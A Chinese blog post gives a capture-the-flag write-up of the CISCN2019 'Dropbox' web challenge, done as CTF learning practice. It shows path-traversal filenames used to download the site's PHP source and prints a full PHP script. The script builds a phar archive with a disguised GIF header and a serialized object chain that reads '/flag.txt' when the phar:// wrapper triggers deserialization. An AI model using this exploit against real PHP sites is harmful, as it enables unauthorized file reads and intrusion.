<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.1.1">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.6.0/css/all.min.css" integrity="sha256-5eIC48iZUHmSlSUz9XtjRyK2mzQkHScZY1WdMaoz74E=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"example.com","root":"/","images":"/images","scheme":"Muse","darkmode":false,"version":"8.21.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"copycode":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js"></script>

    <meta name="description" content="我能说什么呢？好题，至少对于我这个新手真的震惊到了  首先是干吗呢？ 是尝试一下注入，发现没用所以开始疯狂抓包 在点到下载的时候蹦出来  也就是说filename任我写是吧，所以我们开始找一些可以找到的文件 捕捉的到的话，一个注册，一个登录，一个上传文件，一个下载，一个删除 也就是 ..&#x2F;..&#x2F;register.php..&#x2F;..&#x2F;login.php..&#x2F;..&#x2F;upload.php..&#x2F;..&#x2F;dow">
<meta property="og:type" content="article">
<meta property="og:title" content="[CISCN2019 华北赛区 Day1 Web1]Dropbox">
<meta property="og:url" content="http://example.com/2024/06/03/buu%E5%88%B7%E9%A2%98%E9%9B%86-web/CISCN2019-%E5%8D%8E%E5%8C%97%E8%B5%9B%E5%8C%BA-Day1-Web1-Dropbox/index.html">
<meta property="og:site_name" content="why">
<meta property="og:description" content="我能说什么呢？好题，至少对于我这个新手真的震惊到了  首先是干吗呢？ 是尝试一下注入，发现没用所以开始疯狂抓包 在点到下载的时候蹦出来  也就是说filename任我写是吧，所以我们开始找一些可以找到的文件 捕捉的到的话，一个注册，一个登录，一个上传文件，一个下载，一个删除 也就是 ..&#x2F;..&#x2F;register.php..&#x2F;..&#x2F;login.php..&#x2F;..&#x2F;upload.php..&#x2F;..&#x2F;dow">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="c:\Users\%E6%B1%AA%E6%B6%B5%E8%A3%95\AppData\Roaming\Typora\typora-user-images\image-20240603204833820.png">
<meta property="og:image" content="c:\Users\%E6%B1%AA%E6%B6%B5%E8%A3%95\AppData\Roaming\Typora\typora-user-images\image-20240603204936007.png">
<meta property="og:image" content="c:\Users\%E6%B1%AA%E6%B6%B5%E8%A3%95\AppData\Roaming\Typora\typora-user-images\image-20240603205332955.png">
<meta property="og:image" content="c:\Users\%E6%B1%AA%E6%B6%B5%E8%A3%95\AppData\Roaming\Typora\typora-user-images\image-20240603205402910.png">
<meta property="og:image" content="c:\Users\%E6%B1%AA%E6%B6%B5%E8%A3%95\AppData\Roaming\Typora\typora-user-images\image-20240603205515097.png">
<meta property="og:image" content="c:\Users\%E6%B1%AA%E6%B6%B5%E8%A3%95\AppData\Roaming\Typora\typora-user-images\image-20240603211219708.png">
<meta property="og:image" content="c:\Users\%E6%B1%AA%E6%B6%B5%E8%A3%95\AppData\Roaming\Typora\typora-user-images\image-20240603205822773.png">
<meta property="og:image" content="c:\Users\%E6%B1%AA%E6%B6%B5%E8%A3%95\AppData\Roaming\Typora\typora-user-images\image-20240603210024082.png">
<meta property="og:image" content="c:\Users\%E6%B1%AA%E6%B6%B5%E8%A3%95\AppData\Roaming\Typora\typora-user-images\image-20240603211730723.png">
<meta property="article:published_time" content="2024-06-03T12:47:23.000Z">
<meta property="article:modified_time" content="2024-06-03T13:18:40.581Z">
<meta property="article:author" content="why">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="c:\Users\%E6%B1%AA%E6%B6%B5%E8%A3%95\AppData\Roaming\Typora\typora-user-images\image-20240603204833820.png">


<link rel="canonical" href="http://example.com/2024/06/03/buu%E5%88%B7%E9%A2%98%E9%9B%86-web/CISCN2019-%E5%8D%8E%E5%8C%97%E8%B5%9B%E5%8C%BA-Day1-Web1-Dropbox/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"http://example.com/2024/06/03/buu%E5%88%B7%E9%A2%98%E9%9B%86-web/CISCN2019-%E5%8D%8E%E5%8C%97%E8%B5%9B%E5%8C%BA-Day1-Web1-Dropbox/","path":"2024/06/03/buu刷题集-web/CISCN2019-华北赛区-Day1-Web1-Dropbox/","title":"[CISCN2019 华北赛区 Day1 Web1]Dropbox"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>[CISCN2019 华北赛区 Day1 Web1]Dropbox | why</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">why</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">疯疯癫癫的小辣鸡</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
    </div>
  </div>
</div>







</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-4"><a class="nav-link" href="#phar%E6%96%87%E4%BB%B6"><span class="nav-number">1.</span> <span class="nav-text">phar文件</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">why</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">119</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2024/06/03/buu%E5%88%B7%E9%A2%98%E9%9B%86-web/CISCN2019-%E5%8D%8E%E5%8C%97%E8%B5%9B%E5%8C%BA-Day1-Web1-Dropbox/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="why">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="why">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="[CISCN2019 华北赛区 Day1 Web1]Dropbox | why">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          [CISCN2019 华北赛区 Day1 Web1]Dropbox
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>
      

      <time title="创建时间：2024-06-03 20:47:23 / 修改时间：21:18:40" itemprop="dateCreated datePublished" datetime="2024-06-03T20:47:23+08:00">2024-06-03</time>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><p>我能说什么呢？好题，至少对于我这个新手真的震惊到了</p>
<p><img src="C:\Users\汪涵裕\AppData\Roaming\Typora\typora-user-images\image-20240603204833820.png" alt="image-20240603204833820"></p>
<p>首先是干吗呢？</p>
<p>是尝试一下注入，发现没用所以开始疯狂抓包</p>
<p>在点到下载的时候蹦出来</p>
<p><img src="C:\Users\汪涵裕\AppData\Roaming\Typora\typora-user-images\image-20240603204936007.png" alt="image-20240603204936007"></p>
<p>也就是说filename任我写是吧，所以我们开始找一些可以找到的文件</p>
<p>捕捉的到的话，一个注册，一个登录，一个上传文件，一个下载，一个删除</p>
<p>也就是</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">../../register.php</span><br><span class="line">../../login.php</span><br><span class="line">../../upload.php</span><br><span class="line">../../download.php</span><br><span class="line">../../delete.php</span><br></pre></td></tr></table></figure>

<p>考验你英语词汇的时候到了</p>
<p>在这些文件里又发现了一个class.php‘</p>
<p>一起下下来</p>
<p>之后就是长长的审计代码</p>
<p>发现几个有用消息</p>
<p><img src="C:\Users\汪涵裕\AppData\Roaming\Typora\typora-user-images\image-20240603205332955.png" alt="image-20240603205332955"></p>
<p>格式限制</p>
<p><img src="C:\Users\汪涵裕\AppData\Roaming\Typora\typora-user-images\image-20240603205402910.png" alt="image-20240603205402910"></p>
<p>不能上传带flag的文件</p>
<p>还有，就是</p>
<p><img src="C:\Users\汪涵裕\AppData\Roaming\Typora\typora-user-images\image-20240603205515097.png" alt="image-20240603205515097"></p>
<p>发现两个魔术头</p>
<p>一个call一个destruct</p>
<p>怎么说呢</p>
<p>__call()魔术方法会在对象调用的方法不存在时，自动执行</p>
<p>所以我们后续要照一照有没有调用不存在的对象</p>
<p><img src="C:\Users\汪涵裕\AppData\Roaming\Typora\typora-user-images\image-20240603211219708.png" alt="image-20240603211219708"></p>
<p>在index.php里</p>
<p>还有一个就是</p>
<p><img src="C:\Users\汪涵裕\AppData\Roaming\Typora\typora-user-images\image-20240603205822773.png" alt="image-20240603205822773"></p>
<p>也就是说，我只有可能从这个读到数据呗</p>
<p>而在destruct中应用了</p>
<p><img src="C:\Users\汪涵裕\AppData\Roaming\Typora\typora-user-images\image-20240603210024082.png" alt="image-20240603210024082"></p>
<p>所以说，emm</p>
<p>我们要想办法使用到这个</p>
<p>接下来就是重点</p>
<h4 id="phar文件"><a href="#phar文件" class="headerlink" title="phar文件"></a>phar文件</h4><p>这个文件的特点就是将一个学历恶化的对象存储到phar文件中生成之后，即使更改文件格式，也不会影响作用，之后再通过phar:&#x2F;&#x2F;协议去访问，就可以反序列化</p>
<p>也就是说，我们需要</p>
<p>创建一个phar文件，存储序列化对象，并在最后通过协议去读取</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">class User &#123;</span><br><span class="line">    public $db;</span><br><span class="line">&#125;</span><br><span class="line">class File &#123;</span><br><span class="line">    public $filename;</span><br><span class="line">&#125;</span><br><span class="line">class FileList &#123;</span><br><span class="line">    private $files;</span><br><span class="line">    private $results;</span><br><span class="line">    private $funcs;</span><br><span class="line">    public function __construct() &#123;</span><br><span class="line">        $this-&gt;files = array();</span><br><span class="line">        $this-&gt;results = array();</span><br><span class="line">        $this-&gt;funcs = array();</span><br><span class="line"></span><br><span class="line">        $file = new File();</span><br><span class="line">        $file-&gt;filename = &#x27;/flag.txt&#x27;;	# 这里的flag.txt是多次猜测出来的</span><br><span class="line">        array_push($this-&gt;files, $file);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$user = new User();</span><br><span class="line">$filelist = new FileList();</span><br><span class="line">$user-&gt;db = $filelist;</span><br><span class="line"></span><br><span class="line">$phar = new Phar(&quot;phar.phar&quot;); //后缀名必须为phar</span><br><span class="line">$phar-&gt;startBuffering();</span><br><span class="line">$phar-&gt;setStub(&quot;GIF89a&quot;.&quot;&lt;?php __HALT_COMPILER(); ?&gt;&quot;);  //设置stub，增加gif文件头</span><br><span class="line">$phar-&gt;setMetadata($user); //将自定义的meta-data存入manifest</span><br><span class="line">$phar-&gt;addFromString(&quot;test.txt&quot;, &quot;test&quot;); //添加要压缩的文件</span><br><span class="line">//签名自动计算</span><br><span class="line">$phar-&gt;stopBuffering();</span><br><span class="line">?&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>脚本如下（直接下到脚本所在文件夹）</p>
<p>之后，上传读取即可</p>
<p><img src="C:\Users\汪涵裕\AppData\Roaming\Typora\typora-user-images\image-20240603211730723.png" alt="image-20240603211730723"></p>
<p>读取方式：</p>
<p>先上传，再删除，抓包，再使用伪协议读取，触发反序列化，读取flag</p>

    </div>

    
    
    

    <footer class="post-footer">

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2024/06/02/buu%E5%88%B7%E9%A2%98%E9%9B%86-crypto/RSA/" rel="prev" title="RSA">
                  <i class="fa fa-angle-left"></i> RSA
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2024/06/04/buu%E5%88%B7%E9%A2%98%E9%9B%86-web/HITCON-2017-SSRFme/" rel="next" title="[HITCON 2017]SSRFme">
                  [HITCON 2017]SSRFme <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2024</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">why</span>
  </div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/muse/" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/sidebar.js"></script><script src="/js/next-boot.js"></script>

  






  





</body>
</html>
